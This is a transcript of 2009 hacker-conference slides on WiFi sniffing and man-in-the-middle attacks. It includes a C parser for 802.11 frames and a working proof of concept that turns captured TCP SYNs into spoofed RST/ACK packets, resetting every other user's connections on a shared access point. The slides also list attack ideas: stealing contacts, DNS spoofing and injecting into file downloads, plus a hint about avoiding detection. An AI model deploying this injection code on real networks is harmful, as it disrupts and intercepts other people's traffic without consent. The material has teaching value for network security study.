WiFi networks & RAW SOCKETS IL-HACK2009 Eddie Harari

Upload: samuel-roberts

Post on 29-Jan-2016


TRANSCRIPT

Page 1: WiFi networks & RAW SOCKETS IL-HACK2009 Eddie Harari

WiFi networks &

RAW SOCKETS

IL-HACK2009

Eddie Harari

Page 2

Sniffing WiFi

Managed mode vs. monitor mode.
Promiscuous mode is driver/firmware dependent: every NIC has its own driver and firmware.
Can we sniff with any card? Monitor mode is what it takes, and not every driver supports it.

Page 3

802.11 Data frames

Frame size is not fixed: the header length depends on the Frame Control flags.
Encapsulation is 802.2 LLC/SNAP, inside the frame body.
Some networks use QoS: QoS data frames carry an extra 2-byte QoS Control field.
Is it so important? Yes: get the header length wrong and every offset into the payload is wrong.

Page 4

Sniffing in promiscuous mode

Ethernet II frame “EMULATION”: in managed mode the driver strips the 802.11 header and LLC/SNAP and hands the sniffer a plain 14-byte Ethernet II frame (DA, SA, EtherType, payload).
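Pages 3 and 4 come down to one parsing job. The C function below is an added example, not code from the deck: it does the managed-mode driver's “emulation” by hand on a monitor-mode capture. It skips the radiotap header using its it_len field, walks the variable-length 802.11 header (Addr4 when ToDS and FromDS are both set, the 2-byte QoS Control field on QoS data subtypes, HT Control when the Order bit is set), picks DA/SA according to the DS bits, checks the LLC/SNAP header and emits an Ethernet II frame. The two sample frames are constructed for this example, and the has_fcs argument stands in for the radiotap Flags bit (0x10) that a real caller would read from the radiotap fields.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result codes for wifi_to_ethernet(). */
enum {
    W2E_OK = 0,
    W2E_SHORT = -1,        /* capture truncated */
    W2E_BAD_RADIOTAP = -2, /* bad version or it_len */
    W2E_NOT_DATA = -3,     /* management/control frame, or null-data */
    W2E_PROTECTED = -4,    /* WEP/WPA body: no emulation without the key */
    W2E_NO_SNAP = -5,      /* body does not start with LLC/SNAP */
    W2E_NOSPACE = -6
};

/* Radiotap: u8 version (0), u8 pad, u16 it_len (little-endian), u32 it_present,
 * then whatever fields the driver announced. Only it_len is safe to rely on. */
static int skip_radiotap(const uint8_t *b, size_t len, size_t *off)
{
    if (len < 8) return W2E_SHORT;
    if (b[0] != 0) return W2E_BAD_RADIOTAP;
    size_t it_len = b[2] | ((size_t)b[3] << 8);
    if (it_len < 8 || it_len > len) return W2E_BAD_RADIOTAP;
    *off = it_len;
    return W2E_OK;
}

/* radiotap + 802.11 data frame -> Ethernet II: DA(6) SA(6) EtherType(2) payload.
 * has_fcs is 1 when the radiotap Flags field says the 4-byte FCS is still attached. */
int wifi_to_ethernet(const uint8_t *b, size_t len, int has_fcs,
                     uint8_t *out, size_t outcap, size_t *outlen)
{
    size_t off, hlen = 24, plen;
    int rc = skip_radiotap(b, len, &off);
    if (rc) return rc;
    const uint8_t *f = b + off;
    size_t flen = len - off;
    if (has_fcs) { if (flen < 4) return W2E_SHORT; flen -= 4; }
    if (flen < 24) return W2E_SHORT;

    uint8_t fc0 = f[0], fc1 = f[1];
    unsigned type = (fc0 >> 2) & 3, subtype = fc0 >> 4;
    int to_ds = fc1 & 0x01, from_ds = fc1 & 0x02, qos = subtype & 0x08;
    if (type != 2 || (subtype & 0x04)) return W2E_NOT_DATA;  /* not data, or null-data */
    if (fc1 & 0x40) return W2E_PROTECTED;                    /* Protected Frame bit */

    if (to_ds && from_ds) hlen += 6;     /* Addr4 (WDS) */
    if (qos) hlen += 2;                  /* QoS Control */
    if (qos && (fc1 & 0x80)) hlen += 4;  /* HT Control (Order bit) */
    if (flen < hlen + 8) return W2E_SHORT;

    /* Which address field is DA/SA depends on the DS bits. */
    const uint8_t *da, *sa;
    if (!to_ds && !from_ds)     { da = f + 4;  sa = f + 10; } /* ad hoc */
    else if (from_ds && !to_ds) { da = f + 4;  sa = f + 16; } /* AP -> STA */
    else if (to_ds && !from_ds) { da = f + 16; sa = f + 10; } /* STA -> AP */
    else                        { da = f + 16; sa = f + 24; } /* WDS */

    static const uint8_t snap[6] = { 0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00 };
    const uint8_t *llc = f + hlen;
    if (memcmp(llc, snap, 6) != 0) return W2E_NO_SNAP;

    plen = flen - hlen - 8;
    if (outcap < 14 + plen) return W2E_NOSPACE;
    memcpy(out, da, 6);
    memcpy(out + 6, sa, 6);
    out[12] = llc[6]; out[13] = llc[7];  /* EtherType is already in network order */
    memcpy(out + 14, llc + 8, plen);
    *outlen = 14 + plen;
    return W2E_OK;
}

/* Constructed sample: 8-byte radiotap, QoS data frame from the AP (FromDS),
 * LLC/SNAP with EtherType 0x0800 and a 4-byte stub payload. */
const uint8_t SAMPLE_QOS_FROMDS[] = {
    0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,  /* radiotap, it_len = 8 */
    0x88, 0x02, 0x00, 0x00,                          /* FC: QoS data, FromDS; duration */
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55,              /* Addr1 = DA */
    0x00, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE,              /* Addr2 = BSSID */
    0x00, 0x66, 0x77, 0x88, 0x99, 0xAA,              /* Addr3 = SA */
    0x10, 0x00, 0x00, 0x00,                          /* SeqCtl, QoS Control */
    0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00,  /* LLC/SNAP, IPv4 */
    0x45, 0x00, 0x00, 0x1C                           /* payload stub */
};
/* Constructed sample: plain data frame to the AP (ToDS), ARP, FCS still attached. */
const uint8_t SAMPLE_TODS_FCS[] = {
    0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x08, 0x01, 0x00, 0x00,                          /* FC: data, ToDS; duration */
    0x00, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE,              /* Addr1 = BSSID */
    0x00, 0x66, 0x77, 0x88, 0x99, 0xAA,              /* Addr2 = SA */
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55,              /* Addr3 = DA */
    0x20, 0x00,                                      /* SeqCtl */
    0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06,  /* LLC/SNAP, ARP */
    0x00, 0x01,                                      /* payload stub */
    0xDE, 0xAD, 0xBE, 0xEF                           /* FCS (not verified here) */
};

int main(void)
{
    uint8_t eth[128]; size_t n;
    if (wifi_to_ethernet(SAMPLE_QOS_FROMDS, sizeof SAMPLE_QOS_FROMDS, 0,
                         eth, sizeof eth, &n) == W2E_OK)
        for (size_t i = 0; i < n; i++) printf("%02x%s", eth[i], i + 1 == n ? "\n" : " ");
    return 0;
}
```

Note what the error codes buy you: a protected frame is reported rather than mis-parsed as plaintext, and a radiotap header whose it_len exceeds the capture is rejected instead of being trusted, which is exactly the kind of length field a sniffer must never take at face value.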

Page 5

MITM Implementation

“Clear text” (open) networks.
“WEP” based networks, with shared-key or open (non-shared) authentication.
Famous last words:

“ I surf through my neighbors WIFI connection.”

Page 6

Monitor VS Managed

Monitor mode sniffs everything the radio can hear on the tuned channel.
Monitor mode is undetectable: the card only listens and never transmits.
Packet injection from monitor mode is hard… driver dependent, and you build the 802.11 headers yourself.
A word about WiFi encryption: with WEP or WPA the frame body is encrypted, so without the key you see headers only.
Managed mode is a “dream environment” for packet injection: once associated, you send Ethernet frames and the driver does the 802.11 encapsulation and encryption for you.

Page 7

So which one is it?

Page 8

Pre implementation considerations

Scapy is for script kiddies!? (Scapy is a good solution for certain things…)

A MITM network attack must win race conditions: the injected packet has to reach the victim before the legitimate reply does.

What are the attacks that can take place here?

Page 9

Thinking of an attack

Don’t you hate it when your WiFi bandwidth is low because everyone else is using the AP?

RESET any TCP SYN request! From all machines but ours…

Why can’t you reset an “MS” SYN request on the client side…

Page 10

MITM implementation

libpcap is the best tool to use in this scenario.
Ability to sniff & inject packets (pcap_inject / pcap_sendpacket).
Supports all common DLTs (data link types): DLT_EN10MB in managed mode, DLT_IEEE802_11 or DLT_IEEE802_11_RADIO in monitor mode.
Supports managed and monitor modes.
In monitor mode you can get the radiotap headers… (FREAKY): channel, rate, signal strength.

Page 11

Code & Implementation

EXAMPLE I – RESETCON code (RESETCON PoC code)
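The RESETCON PoC itself is not reproduced in this transcript. The C below is an added example, not the deck's code, showing what such a PoC has to produce to win the race described on pages 8 and 9: it parses a captured Ethernet II/IPv4/TCP frame (what a managed-mode libpcap handle delivers), recognises a pure SYN, and builds the RST/ACK that the client would accept from the server while still in SYN-SENT. Per RFC 793 the client in SYN-SENT checks only the ACK field, which must equal its ISN+1, so that is the one value the builder gets from the capture; the IP source and Ethernet source are spoofed (server address, gateway MAC) so the segment looks like the real reply. The sample SYN is constructed for this example; the choice to send the RST toward the client, and the use of the SYN's destination MAC as the gateway MAC, are assumptions of the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }

/* RFC 1071 one's-complement sum; seed carries the TCP pseudo-header words. */
static uint16_t csum16(const uint8_t *d, size_t len, uint32_t sum)
{
    for (; len > 1; d += 2, len -= 2) sum += get16(d);
    if (len) sum += (uint32_t)d[0] << 8;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* TCP checksum over pseudo-header (src, dst, zero, proto 6, length) + segment. */
static uint16_t tcp_csum(const uint8_t *ip, const uint8_t *tcp, size_t tlen)
{
    uint32_t sum = 0;
    for (int i = 12; i < 20; i += 2) sum += get16(ip + i);
    sum += 6 + tlen;
    return csum16(tcp, tlen, sum);
}

struct syn_info {
    uint8_t client_mac[6], gw_mac[6];
    uint32_t client_ip, server_ip, isn;
    uint16_t sport, dport;
};

/* Ethernet II + IPv4 + TCP. Returns 1 for a pure SYN (a client opening a
 * connection), 0 for anything else. Checksums of the capture are not verified. */
int parse_syn(const uint8_t *pkt, size_t len, struct syn_info *si)
{
    if (len < 14 + 20 + 20 || get16(pkt + 12) != 0x0800) return 0;
    const uint8_t *ip = pkt + 14;
    size_t ihl = (ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < 20 || ip[9] != 6 || len < 14 + ihl + 20) return 0;
    const uint8_t *tcp = ip + ihl;
    if ((tcp[13] & 0x17) != 0x02) return 0;   /* SYN set; ACK, RST, FIN clear */
    memcpy(si->client_mac, pkt + 6, 6);       /* frame source = client */
    memcpy(si->gw_mac, pkt, 6);               /* frame destination = gateway (assumption) */
    si->client_ip = get32(ip + 12);
    si->server_ip = get32(ip + 16);
    si->sport = get16(tcp);
    si->dport = get16(tcp + 2);
    si->isn = get32(tcp + 4);
    return 1;
}

/* RST/ACK as the server would send it, back to the client. RFC 793, SYN-SENT:
 * the ACK must equal ISN+1 or the segment is dropped; SEQ is not checked yet. */
size_t build_rst(const struct syn_info *si, uint8_t *out)
{
    uint8_t *eth = out, *ip = out + 14, *tcp = out + 34;
    memcpy(eth, si->client_mac, 6);
    memcpy(eth + 6, si->gw_mac, 6);
    put16(eth + 12, 0x0800);

    memset(ip, 0, 20);
    ip[0] = 0x45; put16(ip + 2, 40); ip[6] = 0x40; ip[8] = 64; ip[9] = 6;
    put32(ip + 12, si->server_ip);            /* spoofed source */
    put32(ip + 16, si->client_ip);
    put16(ip + 10, csum16(ip, 20, 0));

    memset(tcp, 0, 20);
    put16(tcp, si->dport); put16(tcp + 2, si->sport);
    put32(tcp + 8, si->isn + 1);              /* the one field the client validates */
    tcp[12] = 0x50; tcp[13] = 0x14;           /* data offset 5, flags RST|ACK */
    put16(tcp + 16, tcp_csum(ip, tcp, 20));
    return 54;
}

/* Constructed sample: 192.168.1.10:49152 -> 93.184.216.34:80, ISN 0x01020304,
 * client MAC 00:11:22:33:44:55, gateway MAC aa:bb:cc:dd:ee:01, checksums left 0. */
const uint8_t SAMPLE_SYN[54] = {
    0xAA,0xBB,0xCC,0xDD,0xEE,0x01, 0x00,0x11,0x22,0x33,0x44,0x55, 0x08,0x00,
    0x45,0x00,0x00,0x28, 0x12,0x34,0x40,0x00, 0x40,0x06,0x00,0x00,
    0xC0,0xA8,0x01,0x0A, 0x5D,0xB8,0xD8,0x22,
    0xC0,0x00,0x00,0x50, 0x01,0x02,0x03,0x04, 0x00,0x00,0x00,0x00,
    0x50,0x02,0xFF,0xFF, 0x00,0x00,0x00,0x00
};

int main(void)
{
    struct syn_info si; uint8_t rst[54];
    if (!parse_syn(SAMPLE_SYN, sizeof SAMPLE_SYN, &si)) return 1;
    size_t n = build_rst(&si, rst);
    /* With libpcap, pcap_inject(handle, rst, n) would go here. */
    for (size_t i = 0; i < n; i++) printf("%02x%s", rst[i], i + 1 == n ? "\n" : " ");
    return 0;
}
```

The race is the part no code can guarantee: the RST must arrive before the real SYN/ACK, which is why the deck insists on libpcap rather than a scripting layer, and why a wrong checksum or a wrong ACK value costs the whole attempt (the client silently drops it). This encodes only the RFC 793 rule; a stack that checks more than the ACK field ignores this segment, which is the deck's open question about “MS” clients.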

Page 12

Some ideas of what can be done…

MSN contact stealer…
DNS spoofing…
File download injection…
Any MITM attack.

Page 13

Important things to remember…

802.11 headers are not fixed (ToDS + FromDS add Addr4, QoS adds a 2-byte field).
Radiotap headers are not fixed (read the it_len field; never hard-code the size).
Code must win race conditions.
Packet format is important.
Detectable!? How to avoid that…

Page 14

THANK YOU!!!